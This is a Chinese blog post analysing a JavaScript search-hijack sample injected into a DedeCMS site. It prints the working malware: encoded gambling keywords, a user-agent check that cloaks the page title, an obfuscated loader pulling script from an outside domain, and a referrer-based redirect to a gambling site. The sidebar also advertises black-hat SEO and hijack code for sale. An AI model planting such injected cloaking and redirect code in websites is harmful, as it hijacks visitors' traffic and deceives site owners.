富贵长生天做主由不得我
钢骨正气我做主由不得天
当前位置:网站快照劫持代码-快照删除-黑帽SEO > 网站安全 > 正文

织梦的一段黑帽SEOJS快照劫持代码样本,解密看看

2020-04-28 分类:网站安全 / 黑帽SEO优化 阅读(1146) 评论(0)

<title>&#53;&#20998;&#36187;&#36710;&#24320;&#25143;&#95;&#53;&#20998;&#36187;&#36710;&#35745;&#21010;&#95;&#53;&#20998;&#36187;&#36710;&#27880;&#20876;&#32593;&#22336;&#45;&#53;&#20998;&#36187;&#36710;&#23448;&#32593;</title>
<meta name=”keywords” content=”&#53;&#20998;&#36187;&#36710;&#24320;&#25143;&#44;&#53;&#20998;&#36187;&#36710;&#35745;&#21010;&#44;&#53;&#20998;&#36187;&#36710;&#27880;&#20876;&#32593;&#22336;&#44;&#53;&#20998;&#36187;&#36710;&#23448;&#32593;”/>
<meta name=”description” content=”&#53;&#20998;&#36187;&#36710;&#12304;&#24179;&#21488;&#32593;&#22336;&#58;&#120;&#120;&#53;&#54;&#55;&#46;&#99;&#111;&#109;&#44;&#20195;&#29702;&#113;&#113;&#32676;&#58;&#52;&#52;&#51;&#57;&#52;&#51;&#12305;&#53;&#20998;&#36187;&#36710;&#27880;&#20876;&#44;&#53;&#20998;&#36187;&#36710;&#24320;&#25143;&#44;&#53;&#20998;&#36187;&#36710;&#23448;&#26041;&#32593;&#31449;&#44;&#53;&#20998;&#36187;&#36710;&#24179;&#21488;&#44;&#53;&#20998;&#36187;&#36710;&#26159;&#27491;&#35268;&#30340;&#21527;&#44;&#53;&#20998;&#36187;&#36710;&#25552;&#20379;&#35268;&#24459;&#44;&#25216;&#24039;&#44;&#19979;&#36733;&#44;&#36208;&#21183;&#22270;&#44;&#24320;&#22870;&#32467;&#26524;&#31561;&#20869;&#23481;&#44;&#35802;&#20449;&#32593;&#25237;&#31469;&#35802;&#20026;&#24744;&#25552;&#20379;&#26368;&#22909;&#26368;&#26032;&#30340;&#28216;&#25103;&#20135;&#21697;&#33;”/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”金属制品有限公司”}</script>
<script type=”text/javascript”> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,100,100,113,112,46,106,115,34,62,60,47,115,99,114,105,112,116,62,32,); document.write(xt); </script>

tdk 都用的是 Unicode 编码,,随便解码就可以了,解码出一般都是一些菠菜词

—————————————————————————————————————————

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”金属制品有限公司”}</script>

上面这段代码很简单,障眼法,让网站打开显示看上去是正常的,不容易发现

主要看JS 怎么判断的,eavl 那段JS 代码是ASCII加密 ,解密后,得到

window[“document”][“write”](‘<script type=”text/javascript” src=”https://sfhufh2.com/cxc.js”></script>’);

var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?946f996ab7b073419462ec221f224e6a";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
(function () {
    /*百度推送代码*/
     var bp = document.createElement('script');
     bp.src = '//push.zhanzhang.baidu.com/push.js';
     var s = document.getElementsByTagName("script")[0];
     s.parentNode.insertBefore(bp, s);
     /*360推送代码*/
     var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
     document.write('<script src="' + src + '" id="sozz"><\/script>');
     })();

document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://141198.com\";");
document.writeln("</script>");
一段百度统计,一段推送代码,然后是判断来路劫持。这个菠菜站老油条了,抓到好多站都是这个菠菜站搞的鬼
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
赞(1)
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《织梦的一段黑帽SEOJS快照劫持代码样本,解密看看》
文章链接:https://www.lolmm.cn/wzcgal/544.html
本站资源仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。
标签:

相关推荐

评论 抢沙发

评论前必须登录!

 

关于本站

QQ : 8801-5351
灰机:https://t.me/black0ri 
星期一—五:8:00–18:00
星期六—日:11:00–15:00
专注服务器,网站安全。黑帽SEO、黑帽优化、 网站快照劫持、修复、安全加固、快照删除。

SEO推荐

新一代站群系统 三天收录上万 做搜狗和360

非寄生虫,也不用劫持,这站群怎么都比寄生虫好,投入少,效果好

黑帽推荐

2023寄生虫

2023寄生虫 无限繁殖 多种繁殖方式、跨站无限轮链,自动转码 原价3000。限时7折,赠劫持代码

热门文章